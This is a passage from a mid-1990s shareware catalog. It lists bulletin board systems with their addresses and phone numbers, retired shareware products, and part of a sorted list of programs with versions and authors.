CANADA + BBS Phone: 613-838-4684 + + Skip's Doghouse BBS + Address: 621 Big Horn Dr, O'Fallom MO 63366-6944 + BBS Phone: 314-240-7547 + + Alves, Miguel Lupi + Address: Estrada da Luz 161-31Dto, Lisboa 1600 PORTUGAL + BBS Phone: 351 1 7269042 + + SkyWatch + Address: 2667 Rothwell St, Regina SK S4N 2E2 CANADA + BBS Phone: 306-569-0581 + + Software Creations + Address: 26 Harris Street, Clinton MA 01510 + BBS Phone: 508-365-2359 + + SOM Premium Info Network + Address: 269 WAUKENA AVE, OCEANSIDE NY 11572-4335 + BBS Phone: 516-536-8723 + + Southern Star BBS + Address: c/o Axonn Corp #202, 101 W Robert E Lee Blvd, New + Orleans LA 70124 + BBS Phone: 504-885-5928 + + Southwest BBS + Address: PO Box 70062, Pasadena CA 91117-7062 + BBS Phone: 818-285-8684 + + Space BBS + Address: PO BOX X, MENLO PARK CA 94026 + BBS Phone: 415-323-4193 + + Squirrel's Nest + Address: 1250 E BLUFF ST, MARSEILLES IL 61341 + BBS Phone: 815-795-6371 + + SSB-BBS + Address: PO Box 2153, Pampa TX 79066-2153 + BBS Phone: 806-669-6936 + + Appendix C, "Bulletin Boards" 747 + + + + St Louis Users Group BBS + Address: 12365 Maverick Drive Apt F, Maryland Heights MO 63043 + BBS Phone: 314-878-7614 + + Starlight + Address: PO Box 15752, Seattle WA 98115 + BBS Phone: 206-782-3221 + + Starview Communications + Address: 448 N Cedar Bluff Rd #316, Knoxville TN 37923 + BBS Phone: 615-531-8892 + + Stimpy's Sandbox + Address: 613 Herman Ave, Lemoyne PA 17043 + BBS Phone: 717-730-8504 + + Stingray, Stingray II + Address: 534 W Cromwell Ave, Clovis CA 93611 + BBS Phone: 209-434-4215 + + STSI + Address: PO Box 297, Bertha MN 56437 + BBS Phone: 218-924-2060 + + Sudden Impact + Address: 1011 S Armstrong, Kokomo IN 46902 + BBS Phone: 317-457-5957 + + Sunset Ridge BBS + th + Address: 9320 S 54 Court, Oak Lawn IL 60453 + BBS Phone: 708-636-0971 + + Superior Shareware + Address: PO Box 26005, Thunder Bay ON P7E 2M0 CANADA + BBS Phone: 807-475-3099 + + Support U. + Address: 11221 Manchester Rd # 313, St Louis MO 63122-1122 + BBS Phone: 314-984-8387 + + SYNAPSE BBS + Address: 22 Beloeil, Gatineau QB J8T 7G3 CANADA + BBS Phone: 819-561-4321 + + Systems Engineering + Address: 13 Orchard Rd, South Hamilton MA 01982-1417 + BBS Phone: 508-927-2505 + + T-8000 Information System + Address: 3324 49TH STREET SW, CALGARY AB T3E 3Y3 CANADA + BBS Phone: 403-246-4487 + + Appendix C, "Bulletin Boards" 748 + + + + T.I.F.S.D.B. China-Link + Address: 636 Coral Reef Drive, Galthersburg MD 20878 + BBS Phone: 301-975-9794 USA + + TechNet BBS + Address: Dynamic Learning Systems, PO BOX 805, MARLBORO MA + 01752 + BBS Phone: 508-366-7683 + + Techno-Babble + Address: 29550 High Meadow, Farmington Hills MI 48334 + BBS Phone: 810-737-2912 + + Ten Forward + Address: PO Box 813, Port Angeles WA 98362 + BBS Phone: 206-452-7681 + + TESS + Address: Fuuthof 21, PO BOX 85332, 3508 AH UTRECHT NETHERLANDS + BBS Phone: 31-30-522171 + + Texada Graphic Windows + Address: PO Box 1 Van Anda, Texada Island BC V0N 3K0 CANADA + BBS Phone: 604-486-7229 + + Texstar BBS + Address: 1111 South Main Street Suite A, Duncanville TX 75137 + BBS Phone: 214-298-0273 + + The 8-Bit Corner + Address: 1297 Lakeshore Drive, Muskegon MI 49441 + BBS Phone: 616-755-3013 + + The Albuquerque ROS + Address: PO Box 13150, Albuquerque NM 87192-3150 + BBS Phone: 505-296-3000 + + The Atomic Cafe BBS + Address: PO Box 720894, Houston TX 77072 + BBS Phone: 713-530-8875 + + The Attic BBS + Address: 115 West Street, Colonia NJ 07067-2119 + BBS Phone: 908-396-0790 + + The Baud Room BBS + Address: PO BOX 254, Clifton Hill VIC 3068 AUSTRALIA + BBS Phone: 613-481-8022 + + The Bee Line + Address: 26 Elizabeth Street, Orangeville ON L9W 1C1 CANADA + BBS Phone: 519-940-4990 + + Appendix C, "Bulletin Boards" 749 + + + + The Big Byte + Address: 609 Rogers St., Rockwell NC 28138 + BBS Phone: 704-279-2295 + + The BixBox + Address: PO BOX 75, Chatham KENT ME5 9DL ENGLAND + BBS Phone: 44 0 1634-200931 + + The Black Cauldron + Address: 704 Highgate Dr, Winter Springs FL 32708 + BBS Phone: 407-699-6613 + + The Black Gold BBS + Address: 18252 E 90 N, Owasso OK 74055 + BBS Phone: 918-272-7779 + + The Blue Ridge Express + Address: PO BOX 34446, Richmond VA 23234 + BBS Phone: 804-790-1675 + + THE BOARD + Address: 2828 Cochran St #271, Simi Valley CA 93065 + BBS Phone: 818-366-8874 + + The Bobcat BBS System + Address: 100 Anthony Road #05-100, Cairnhill Garden, Singapore + 0922 SINGAPORE + BBS Phone: 65-738-2509 + + THE BOSS + Address: 206 County Road, Tenafly NJ 07670 + BBS Phone: 201-568-7293 + + The Break RBBS + Address: 4660 WHITAKER PL, DALE CITY VA 22193-3011 + BBS Phone: 703-680-9269 + + The Bytes 'n Bits BBS + Address: P.O. Box 3320, Bayonne N.J. 07002 + BBS Phone: 201-437-4355 + + The Casino Bulletin Board + Address: PO Box 451, Pomona NJ 08240-0451 + BBS Phone: 609-485-2380 + + The Cat Eye + Address: Route 1 Box 184, Shinnston WV 26431 + BBS Phone: 304-592-3390 + + The Chicago Game Zone! + Address: 3001 S King Drive, Suite # 1818, Chicago IL 60616 + BBS Phone: 312-949-0350 + + Appendix C, "Bulletin Boards" 750 + + + + The Colorado Connection + Address: 6700 Van Gordon St, Arvada CO 80001 + BBS Phone: 303-423-9775 + + The Command Line + Address: 4501 E La Palma Ave Ste 200, Anaheim CA 92807 + BBS Phone: 714-779-7500 + + The Communique + Address: 960 Wemberton Dr, Nashville TN 37214 + BBS Phone: 615-885-9792 + + The Computer Matrix + Address: PO BOX 3150, Springfield MO 65808 + BBS Phone: 417-862-8910 + + The Consultant BBS + Address: PO Box 8571, New York NY 10116-4655 + BBS Phone: 718-837-3236 + + The Contraxx BBS + Address: 7836 Snead Lane, Falls Church VA 22043 + BBS Phone: 703-573-5255 + + The Country Store + Address: 816 Belvedere Dr, COLUMBUS GA 31907 + BBS Phone: 706-561-7359 + + The Cutting Edge + Address: 101 W Lincoln St, PO Box 98, Merrillan WI 54754 + BBS Phone: 715-333-2224 + + The Cygnus X-I Opus BBS + Address: 12 Homesdale Ave, Southington CT 06489 + BBS Phone: 203-620-0757 + + The Dart Board + Address: 17921 Co Rd 25, Dolores CO 81323 + BBS Phone: 303-882-2360 + + The Darton Connection + Address: 2400 Gillionville Rd, Albany GA 31707 + BBS Phone: 912-430-3007 + + The DataCom System + Address: PO Box 332, Cornwall ON K6H 5T1 CANADA + BBS Phone: 613-938-5000 + + The DataExchange BBS + Address: 119 Herring St, Leesville LA 71446 + BBS Phone: 318-239-2122 + + Appendix C, "Bulletin Boards" 751 + + + + The Dew Drop Inn + Address: 3567 MOUNTAIN VIEW DR #222, WEST MIFFLIN PA 15122 + BBS Phone: 412-854-0619 + + The Electronic Grapevine + Address: 1260 Thompson Ave, Napa CA 94558 + BBS Phone: 707-257-2338 + + The Electronic Oracle + Address: 12 Brentwood Road, FLINDERS PARK 5025 S.AUSTRALIA + BBS Phone: 61 8 234 1150 + + The Elusive Diamond + Address: 301 Hunts Neck Rd, Poquoson VA 23662-1017 + BBS Phone: 804-868-3817 + + The Evans BBS + Address: 302 East Coffren Ave, Greenville MI 48838 + BBS Phone: 616-754-6180 + + The FABulous BBS + Address: 851 State Road 434 E Ste 106, Longwood FL 32750-5364 + BBS Phone: 407-834-6466 + + The Family Room + Address: 3172 Wessex Way, Clearwater FL 34621-1941 + BBS Phone: 715-355-8311 + + The File Bank + Address: PO BOX 2828, Fallbrook CA 92088 + BBS Phone: 619-728-4318 + + THE FILE BANK, INC. + Address: 540 Acoma Street, Denver CO 80204 + BBS Phone: 303-534-4646 + + The Firebox Express + Address: 2120 Keystone, Sterling Heights MI 48310 + BBS Phone: 810-826-9411 + + The French Connexion + Address: 3017 St. Clair Ave #264, Burlington ON L7N 3P5 CANADA + BBS Phone: 905-632-5653 + + The G-Net BBS + Address: 610 Elm Street, Struthers OH 44471 + BBS Phone: 216-755-0843 + + The Game Room + Address: 7007 Illahee Rd NE, Bremerton WA 98311-9664 + BBS Phone: 206-698-9734 + + Appendix C, "Bulletin Boards" 752 + + + + The Garbage Dump + Address: PO BOX 16032, Albuquerque NM 87191-6032 + BBS Phone: 505-294-5675 + + The Global-Link Network Inc + Address: PO Box 61299, Denver CO 80206-8299 + BBS Phone: 303-680-4563 + + The Golden*Dane BBS + Address: 633 Franklin Ave Suite 128, NUTLEY NJ 07110 + BBS Phone: 201-338-5265 + + The Good News BBS + Address: 717 S Henderson St, PO Box 1273, Bloomington IN 47402 + BBS Phone: 812-335-3575 + + The Grinder + Address: 195-114 Tierra Rejada Rd, Simi Valley CA 93065 + BBS Phone: 805-583-5833 + + The Hole in the Wall + Address: 6325 N Ponderosa Way, Parker CO 80134-5615 + BBS Phone: 303-841-5515 + + The INDEX System (tm) + Address: 6030 E Alabama Ste 114, Woodstock GA 30188 + BBS Phone: 404-924-8472 + + THE INVENTION FACTORY + Address: 321 Greenwich Street, New York NY 10013-3340 + BBS Phone: 212-274-8110 + + The Kandy Shack + Address: 12531 Strathmore Dr, Garden Grove CA 92640-5502 + BBS Phone: 714-636-2667 + + The Laser BBS + Address: 18 Heath Terrace, Cortlandt Manor NY 10566 + BBS Phone: 914-734-7045 + + The Ledge PCBoard + Address: 6858 Acco Street, Los Angeles CA 90040 + BBS Phone: 818-896-4015 + + The Liberty BBS + Address: Suite 102, 446 S Anaheim Hills Rd, Amaheim Hills CA + 92807 + BBS Phone: 714-996-7777 + + The Library! BBS + Address: PO Box 70177, Riverside CA 92513 + BBS Phone: 909-780-6365 + + Appendix C, "Bulletin Boards" 753 + + + + The LINK BBS + Address: 2975 Wilshire Blvd # 600, Los Angeles CA 90010 + BBS Phone: 310-459-1264 + + The LitterBox (r) + Address: 415 S Potomac St # 2, Waynesboro PA 17268 + BBS Phone: 717-765-8995 + + The Locker Room + Address: 12132 Severn Way, Riverside CA 92503 + BBS Phone: 909-270-5278 + + The Mages Inn + Address: 4326 South 26 Street, Omaha NE 68107 + BBS Phone: 402-734-4748 + + The Mail Room BBS + Address: 903 College Dr Apt #1, Anderson IN 46012-4040 + BBS Phone: 317-644-5029 + + The Mars Station + Address: PO Box 878, Yermo CA 92398 + BBS Phone: 619-254-3012 + + The Menagerie BBS + Address: 209 W Pearl Street, Willard OH 44890 + BBS Phone: 419-935-0245 + + The Miami PC Users Group + th + Address: 10448 SW 49 Place, Cooper City FL 33328 + BBS Phone: 305-680-9481 + + The Mind's Eye + th + Address: 1540 19 Street SW, HICKORY NC 28602 + BBS Phone: 704-322-1681 + + The MOG-UR'S EMS + Address: 11846 Balboa Blvd #293, Granada Hills CA 91344 + BBS Phone: 818-366-4837 + + The Motherboard III + Address: Accudrive, 903-I Loop 336 West, Conroe TX 77301 + BBS Phone: 409-441-2939 + + The National Cheese Emporium + Address: 1105 Creswood Rd, Philadelphia PA 19115-3003 + BBS Phone: 215-673-0261 + + The Nexus BBS + Address: PO Box 8088, Fredericksburg VA 22404 + BBS Phone: 703-898-7205 + + Appendix C, "Bulletin Boards" 754 + + + + The Nor'Easter Premium BBS + Address: 25 Pendleton Lane, Londonderry NH 03053-3676 + BBS Phone: 603-886-7072 + + The Omega Line + Address: 416 W St John, Olney IL 62450 + BBS Phone: 618-392-4607 + + The On Ramp + Address: 5240 Bank St # 17, Fort Myers FL 33907 + BBS Phone: 813-939-5630 + + The Out-Post RBBS + Address: PO Box 1568, OZARK AL 36361-1568 + BBS Phone: 334-774-6989 + + The Philosopher's Stone + Address: PO Box 496, Ft Dick CA 95538 + BBS Phone: 707-465-0925 + + The Pier Exchange + Address: 346 Bedford Avenue, Buffalo NY 14216-3135 + BBS Phone: 716-875-0283 + + The Point BBS + th + Address: 1601 60 Ave, Hammond WI 54015-5025 + BBS Phone: 715-345-1327 + + The Privy Ledged BBS + Address: 5572 West Joaquin Street, Kearns UT 84118-7212 + BBS Phone: 801-966-6270 + + The PROF-BBS + Address: 2050 Idle Hour Center Ste 106, Lexington KY 40502 + BBS Phone: 606-269-1565 + + The Racers Net + Address: PO Box 251, Tahoe Vista CA 96148-0251 + BBS Phone: 916-546-2095 + + The Radio Wave PCBoard BBS + Address: PO Box 1026, Delran NJ 08075 + BBS Phone: 609-764-0812 + + The Registry BBS + Address: 3131 Mountain Creek Rd Apt 7A7, Chattanooga TN 37415 + BBS Phone: 615-870-0794 + + The Resting Place BBS + Address: PO Box 323, Sandwich IL 60548-0323 + BBS Phone: 815-786-6240 + + Appendix C, "Bulletin Boards" 755 + + + + The Richmond Connection BBS + Address: PO Box 70241, Richmond VA 23255 + BBS Phone: 804-740-1364 + + The RoadHouse BBS + Address: 4095-B Creek Wau, Indianapolis IN 46227-4036 + BBS Phone: 317-784-2147 + + The Rock Garden + Address: PO Box 33455, Phoenix AZ 85067-3455 + BBS Phone: 602-220-0001 + + The Sandbox + Address: PO Box 30902, Midwest City OK 73140 + BBS Phone: 405-737-9540 + + The Sceptic Tank + Address: PO Box 458, Dupont WA 98327-0458 + BBS Phone: 206-754-4878 + + The Seaside + Address: PO Box 2686, Santa Barbara CA 93120 + BBS Phone: 805-964-4766 + + The Seeker's Place + Address: 58 MacDade, Darby PA 19023 + BBS Phone: 215-237-1281 + + The Shack BBS + Address: 43 Hillview Road, Findon Valley, Worthing WEST SUSSEX + BN14 OBX U.K. + BBS Phone: 44 903-268668 + + The Shareware Support BBS + Address: 82 Akeman Street, Tring HERTS HP23 6AF U.K. + BBS Phone: 44 442 891109 + + The Silverado + Address: 1412 Winterville St, Deltona FL 32725 + + the small circle bbs + Address: PO Box 287, SUNSET LA 70584 + BBS Phone: 318-662-3328 + + The Sounds of Silence + Address: 2401 Lebanon Road # 5, Nashville TN 37214-2412 + BBS Phone: 615-449-5969 + + The Southeast Data Link + Address: P.O. Box 15304, Sarasota FL 34277 + BBS Phone: 813-954-DATA + + Appendix C, "Bulletin Boards" 756 + + + + The Sports Club BBS + Address: 424 Rosemont Ave, Pasadena CA 91103-3556 + BBS Phone: 818-792-4752 + + The Starship][BBS + Address: 50 Gordon Road, Roxbury Twsp NJ 07885 + BBS Phone: 201-935-1485 + + The Storm Front BBS + Address: PO Box 144, Croydon PA 19021-5055 + BBS Phone: 215-788-4662 + + The Tarheel Connection + Address: 6545 Lake Brandt Rd, Summerfield NC 27358 + BBS Phone: 910-643-9570 + + The Tech Resource + Address: 3495 Hayes Lane, Beaumont TX 77703-2755 + BBS Phone: 409-892-1977 + + The Tennessee Connection + Address: 5543 Edmondson Pike Ste 184, Nashville TN 37211 + BBS Phone: 615-781-8636 + + The TOY SHOP-PC BBS + Address: 4195 Elwood Road, Spring Hill FL 34609 + BBS Phone: 904-688-9124 + + The Transporter Room + Address: 1018 Glenfiddich Drive, Charlotte NC 28215 + BBS Phone: 704-567-9513 + + The Treasure Chest + Address: 1565 Woods Road B2, Winston-Salem NC 27106 + BBS Phone: 919-922-1047 + + The Twilight Zone + Address: 1119 E. Main Street, Auburndale WI 54412 + BBS Phone: 715-652-2758 + + The UpAllNite Bbs + Address: RR #2 Unit 45, Chatham ON N7M RS2 CANADA + BBS Phone: 519-351-4364 + + The Upper Limit BBS + Address: UP Technologies Inc, 917 South Division St, Salisbury + MD 21801-6432 + BBS Phone: 410-860-0212 + + The V.I.N.E. BBS + Address: 2810 Allen's Way, Charlottesville VA 22901 + BBS Phone: 804-978-7182 + + Appendix C, "Bulletin Boards" 757 + + + + The Vault BBS + Address: 210 N Seffner Ave, Marion OH 43302 + BBS Phone: 614-387-2762 + + The Wall BBS + Address: 69 Hawkin Rd, New Egypt NJ 08533 + BBS Phone: 609-758-1991 + + The Wild Onion! + Address: 118 S York Ste 204, ELMHURST IL 60126 + BBS Phone: 708-993-0461 + + The Windmill Company BBS + Address: PO Box 1529, Lubbock TX 79408 + BBS Phone: 806-792-6116 + + The Wishing Well BBS + Address: PO Box 3722, Centerline MI 48015-3722 + BBS Phone: 810-754-6731 + + the Wizard's Gate BBS + Address: 463 East Town Street, Columbus OH 43215-4796 + BBS Phone: 614-224-1635 + + Thompson Towers BBS + Address: 4447 Ben Hill Road, Lithia Springs GA 30057-1130 + BBS Phone: 404-941-0746 + + Thundervolts BBS + Address: 1175 Montecito Drive, Los Angeles CA 90031-1651 + BBS Phone: 213-225-5474 + + Tiger Team Buddhist Info Net + Address: 1920 Francisco #112, Berkeley CA 94709 + BBS Phone: 510-268-0102 + + Tim Eo/Timbbs + Address: 275 Dorin Court Road, Fort Lee NJ 07024 + BBS Phone: 201-224-2688 + + Time Slice BBS + Address: PO Box 81, Greenlawn NY 11740-0081 + BBS Phone: 516-266-5182 + + TNT Online + Address: 11350 Metro Pkwy #101, Ft Myers FL 33912 + BBS Phone: 813-337-5999 + + Toledo's TBBS + Address: 4440 Samaria Road, Temperance MI 48182 + BBS Phone: 313-854-6001 + + Appendix C, "Bulletin Boards" 758 + + + + Top City BBS + Address: PO Box 2311, St Paul MN 55102-0311 + BBS Phone: 612-225-1003 + + Totoche BBS + Address: 6305 Beaucourt, Montreal-Nord QC H1G 2G3 CANADA + BBS Phone: 514-326-8363 + + Trade Link + Address: Wolfsoelden 11, 74653 Kuenzelsau GERMANY + BBS Phone: 604-768-0988 + + Trader's Connection + Address: PO BOX 11499, Indianapolis IN 46201-0499 + BBS Phone: 317-359-5199 + + Tranquility Base BBS + Address: PO Box 19483, OKLAHOMA CITY OK 73144-0483 + BBS Phone: 405-682-2352 + + Trojan Horse + Address: Trinity Valley School, 6101 McCart Ave, Ft Worth TX + 76133 + BBS Phone: 817-346-8382 + + TTPBBS + Address: Lions Buildings Market Place, Uttoxeter STAFFS ST14 + 8HP ENGLAND + BBS Phone: 44-1889 568625 + + U.T. Dallas Undergraduate + Address: Univ of Texas at Dallas, PO Box 830688 M/S J03.2, + Richardson TX 75083-0688 + BBS Phone: 214-883-2168 + + V-I-S-I-O-N + Address: PO BOX 290, W FRIENDSHIP MD 21794 + BBS Phone: 410-461-8082 + + Valley Network + Address: PO Box 3365, Hailey ID 83333 + BBS Phone: 208-788-0703 + + VICOM Information Service + Address: 68 E Main St, Chillicothe OH 45601 + BBS Phone: 614-775-7083 + + Virginia Data Exchange + Address: 7086 Enright Dr, Citrus Heights CA 95621 + BBS Phone: 916-729-5396 + + Vision Quest + Address: 1695 Sixth St, Muskegon MI 49441 + BBS Phone: 616-725-8566 + + Appendix C, "Bulletin Boards" 759 + + + + VISIONARY + Address: 105 E Butler St, Manchester IA 52057-1606 + BBS Phone: 310-927-4474 + + VisionBytes! + Address: 210 Summerford Circle, San Ramon CA 94583-4400 + BBS Phone: 510-355-0968 + + Visus BBS + Address: Av.Marques de Tomar 71 A, Lisboa 1000 PORTUGAL + BBS Phone: 3511796 5839 + + VOS! OnLine Services + Address: 21-710 Coronation Ave, Ottawa ON K1G 4G7 CANADA + BBS Phone: 613-823-3142 + + Way Out Wild! + Address: 24 VijayVilla Bld, 79 Worli Seaface, Bombay + Maharashtra 400025 INDIA + BBS Phone: 91-22-496-1609 + + Wesley's Window + Address: 220 Orange Church Road, Canton GA 30114 + BBS Phone: 404-522-9042 + + Why Not RBBS-PC + Address: PO BOX 20643, Long Beach CA 90801-0643 + BBS Phone: 310-436-1311 PUB + + WinCrew BBS + th + Address: 14540 SW 77 Ave, Miami FL 33158-1233 + BBS Phone: 305-253-0100 + + Windchimes BBS + Address: PO Box 2100, Jupiter FL 33468 + BBS Phone: 407-223-8918 + + Window Shop + Address: 4504 Peppermill Ct, Dumfries VA 22026 + BBS Phone: 703-878-2989 + + WINGIT + Address: 1929 North Mission Road, Tallahassee FL 32303 + BBS Phone: 904-386-8693 + + WLIO TBBS + Address: 706 McKenzie Dr, Lima OH 45805-1835 + BBS Phone: 419-228-8227 + + Wolverine BBS + Address: PO Box 646, Midland MI 48640 + BBS Phone: 517-695-9952 + + Appendix C, "Bulletin Boards" 760 + + + + World Data Network,Inc + Address: 11088 Thrush Ridge Road, Reston VA 22091-4722 + BBS Phone: 703-620-8900 + + WorldLink BBS + Address: 1 Seogebrook Close, Oakwood DERBY DE21 2DX U.K. + BBS Phone: 44 332-830362 + + Worldlink BBS LTD + Address: 28 Athol Green, Ovenden, Halifax W. Yorkshire HX3 5RN + U.K. + BBS Phone: 44-1422-322346 + + Xanadu BBS + Address: 862 Old Plainville Rd Unit #29, New Bedford MA 02745 + BBS Phone: 508-995-9876 + + Xentel Interactive Inc + Address: C/O 830, 615 Macleod Trails, Calgary AB T2G 4T8 CANADA + BBS Phone: 403-531-6100 + + Xevious BBS + Address: 585 Edmands Road, Framingham MA 01701-3088 + BBS Phone: 508-788-6951 + + YA! WEBECAD! + Address: 3117 Tremont Rd, Evansville IN 47710-3233 + BBS Phone: 812-428-3870 + + Yutron Tech (Hong Kong) Lmtd + Address: Suite 1605, Tower A New Trade, Plaza, 6, On Ping + Street, Shatin, N. T. Hong Kong + BBS Phone: 852 6868 169 + + Ziff-Davis Interactive + Address: 25 First St, Cambridge MA 02141 + + Appendix D, "Retired shareware" 761 + + + + + + Appendix D + Retired shareware + + This appendix lists shareware products now "retired" by the + author. Retired products no longer receive the minimum levels + of support, and the authors have agreed to return any registra- + tion fees sent in for the software. + + An author may retire a shareware product for any number of + reasons. Some applications have outlived their usefulness; + others may have grown too costly to continue supporting due to + competition from other authors. + + + Product: Astro-World for Windows + Author: Marcus Fabian + Astrology Program incl. printed evaluations. + + + Product: Astro-World fuer Windows + Author: Marcus Fabian + Astrologieprogramm (deutsch) fu"r Windows. + + + Product: Bible IQ Challenge + Author: R.K. West Consulting + Bible trivia game for 1-4 players. + + + Product: Book of Changes + Author: R.K. West Consulting + I CHING fortunes and philosophy. + + + Product: ClipBook + Author: Software Co-op + Windows graphics image cataloger w/clipart. + + + Product: DayCare + Author: Software Co-op + Complete daycare recordkeeping system. + + + Product: Dinger + Author: Pinecliffe International - ASG + Superceded by WOPR 2.0, for WinWord 2.0. + + + Product: DiskPie + Author: Zorn Software + Graphical File Manager extension. + + Appendix D, "Retired shareware" 762 + + + + Product: Enveloper + Author: Pinecliffe International - ASG + Superceded by WOPR 2.0, for WinWord 2.x. + + + Product: FOURU + Author: GTX Software + Four handy utilities. + + + Product: General Purpose System Analyzer + Author: COBOL Maintenance Technologies + COBOL system analysis and documentation. + + + Product: GS TROOP TRACKER + Author: Robert Barrentine Consulting + Girl Scout troop records system with reports. + + + Product: Halloween Match + Author: Glen DeBiasa + Eat all your candy corn by matching tiles. + + + Product: I.Q. Challenge + Author: R.K. West Consulting + Test knowledge in 5 categories, earn diploma. + + + Product: ImageCommander + Author: JASC, Inc. + Image file management for Windows. + + + Product: Maillist / M-Label + Author: R.K. West Consulting + Easy mailing list system for home or business. + + + Product: MERIT BADGE TRACKER + Author: Robert Barrentine Consulting + Council/district system for MB counselors. + + + Product: MYMIQ + Author: Gateway Software + Managing Your Money import stock quotes. + + + Product: OMNIDiZk + Author: Unicorn Software Limited + DiZk cataloging and labeling system. + + Appendix D, "Retired shareware" 763 + + + + Product: ORGANIZE! Your Legal Case Notes + Author: HomeCraft Software + Cataloging system for statutes and case notes. + + + Product: An Ounce Of Prevention + Author: Pete Maclean + Disaster prevention/data protection system. + + + Product: PACK TRACKER + Author: Robert Barrentine Consulting + Cub Scout pack automated records system. + + + Product: PARTY TRACKER + Author: Robert Barrentine Consulting + Political organization membership system. + + + Product: PC Bartender + Author: HomeCraft Software + Recipes for drinks, featuring no-alchol drink. + + + Product: Penname + Author: R.K. West Consulting + Helps writers come up with names. + + + Product: PixFolio Image Catalog System + Author: ACK Software + Windows Image Cataloging System. + + + Product: PrinterBUDDY + Author: Lenard Dean + A setup utility for all printers. + + + Product: Private Library + Author: My Little Realm Enterprises + Put your own books, tapes, etc. online. + + + Product: PRO$TOCK + Author: Gateway Software + Downloads stock quotes & news from Prodigy. + + + Product: PROMASTER + Author: Gateway Software + Adds power to Prodigy software. + + Appendix D, "Retired shareware" 764 + + + + Product: Pulsar for DOS + Author: Tesserax Information Systems + LaserJet printer utility for DOS. + + + Product: QMU + Author: Gateway Software + Prodigy/Quicken link. + + + Product: Records of the Realm + Author: My Little Realm Enterprises + Memory assistant for family documents. + + + Product: Savings + Author: My Little Realm Enterprises + Savings helps you remember what you have. + + + Product: SCBABOTL + Author: Raymond A.J. Pesek + Fire dept. SCBA bottle & PASS management. + + + Product: Soothsayer aka Oracle + Author: R.K. West Consulting + Tarot and I Ching. + + + Product: Stardial + Author: GTX Software + Autodialer For Galaxy/Starlink service. + + + Product: TRAINING TRACKER + Author: Robert Barrentine Consulting + Council/district training administrator. + + + Product: TROOP TRACKER + Author: Robert Barrentine Consulting + Scout Troop records system with reports. + + + Product: Your Financial Advisor + Author: HomeCraft Software + Loan and finacial calculations. + + + Product: Your Menu + Author: HomeCraft Software + Hard disk menu and DOS shell. + + Appendix E, "Sorted list of all programs" 765 + + + + + + Appendix E + Sorted list of all programs + + This appendix notes the author of each program listed in this + catalog. It comes in extremely handy when you want to see if a + given program comes from an ASP member, or when you want to + know the current version number/release date for a program. + Hint: look in the index for the program (by name) if you want + to see a full description for the program or learn the author's + address & phone number. You'll find page references for all + the information you need. + + st + 1 &goal Fantasy Football 3.07 (01-31-94) McS Custom Software + 2DO Personal Task Manager 1.2 (06-01-94) William Anderson + Consulting + 4DOS 5.0 (11-23-93) JP Software Inc. + 4DOS for Windows NT 2.0 (01-24-94) JP Software Inc. + 4EDIT 2.00 (03-06-94) XD Systems + 4FILES 3.23 (08-25-95) Hand-Crafted Software + 4OS2 2.0 (12-16-93) JP Software Inc. + 4Print/4Book DOS 4.16 (06-01-94) Korenthal Associates, Inc. + 4Print/4Book Windows 4.16 (06-01-94) Korenthal Associates, + Inc. + 4ZIP/4UNZIP 2.01 (12-14-91) XD Systems + A86 Macro Assembler 3.22 (01-20-90) Eric Isaacson Software + AA-Array.DLL 1.0 (01-01-95) AA-Software International + AAVBSORT.DLL 1.0 (01-01-95) AA-Software International + ABcmd 1.0 (03-15-94) Abri Technologies, Inc. + ABmenu 1.6 (10-22-92) Abri Technologies, Inc. + Above & Beyond 3.1 (06-09-94) 1Soft Corp. + ACTION Process Automator 1.05 (08-25-95) Redei Enterprises + Activity Monitor 1.1 (07-31-94) Louis Desjardins + ACZAR for DOS 2.10 (10-23-93) CZAR Software + ACZAR for Windows 3.10 (09-07-95) CZAR Software + AdMaker 3.5 (05-06-94) OsoSoft + AeroChart 1.20 (12-12-93) MoonStone Software + Ahelp Clipper Help Library 1.43 (05-05-95) MicroFox Company + Alad_IRQ 1.0 (12-27-93) Computer Telecommunication Systems, + Inc. + Alarm VBX 1.3 (08-14-94) Mabry Software + AlbumMaster 8.50 (09-01-94) Unicorn Software Limited + AlbumMaster For Windows 2.10 (09-01-94) Unicorn Software + Limited + ALITE 1.20r (07-08-93) TRIUS, Inc. + ALL-PRO League Scheduler 1.1 (01-17-95) ALL-PRO Software Inc. + AMF Daily Planner & P.I.M. 5.0 (08-18-95) AMF + AMF Intelligent Organ for Win 1.0 (05-01-95) AMF + AMF Multimedia Jukebox (WIN) 1.0 (05-01-95) AMF + AMF'S WINFAX PRO 4.0 MACRO 1 (09-06-94) AMF + Amortz - Loan Schedules & More! 1.60 (10-31-94) Mountain View + Software + + Appendix E, "Sorted list of all programs" 766 + + + + Ample Notice 3.00 (07-12-93) Granny's Old-Fashioned Software + Ancient Yacht 1.0 (01-06-95) LatticeWork Software + Anim. Multiplication & Division 3.0 (05-12-94) FLIX + Productions + Animated Alphabet 1.0 (04-12-90) FLIX Productions + Animated Bugs 1.0 (09-07-94) FLIX Productions + Animated Clock 3.0 (05-12-94) FLIX Productions + Animated Math 1.0 (02-15-91) FLIX Productions + Animated Memory Game 3.0 (05-12-94) FLIX Productions + Animated Money 1.0 (05-12-94) FLIX Productions + Animated Shapes 1.0 (09-25-90) FLIX Productions + Animated VGA Memory Game 1.0 (05-12-94) FLIX Productions + Animated Words 3.0 (05-12-94) FLIX Productions + AntiC 1.14 (09-01-92) Cascoly Software + APT Mailing Assistant 5.30 (01-15-95) APT Computer Solutions, + Inc. + APT Mailing Assistant (OS/2) 1.10 (01-15-95) APT Computer + Solutions, Inc. + ARCHIVE TRACKER 1.0 (12-20-93) Robert Barrentine Consulting + Around The House 2.02 (06-26-94) RMH Computer Services + ARROW TRACKER 2.0 (05-31-94) Robert Barrentine Consulting + AS-EASY-AS 5.50e (10-29-93) TRIUS, Inc. + AsciiConvert 1.00 (09-05-95) Informatik Inc. + ASP List of Approved BBSs n/a (01-01-80) Association of + Shareware Professionals + ASP List of Approved Vendors n/a (01-01-80) Association of + Shareware Professionals + ASP Vendor Member Application n/a (06-10-92) Association of + Shareware Professionals + ASTRO 2.86 (11-19-94) Christopher J. Noyes Software + ASTRO For Windows 1.08 (11-19-94) Christopher J. Noyes + Software + ATC: Air Traffic Controller 1.0 (09-29-85) Cascoly Software + ATTRB 1.6 (10-22-92) Abri Technologies, Inc. + BabySpool 3.00 (01-02-95) Budget Software Company + Backup 1.4 (05-21-94) Burnham Park Software, Inc. + BakupWiz 3.29fl (01-03-92) PCX + BarCod VBX 1.3 (08-14-94) Mabry Software + BASASM.LIB 1.0 (06-22-92) Annette Cuomo + Basic Training 1.01 (10-07-92) Cascoly Software + Basketball Statistics 1.0 (11-05-94) Gentle Productions + BassMap 1.3 (09-01-94) Arcanum Computing + A Batch View 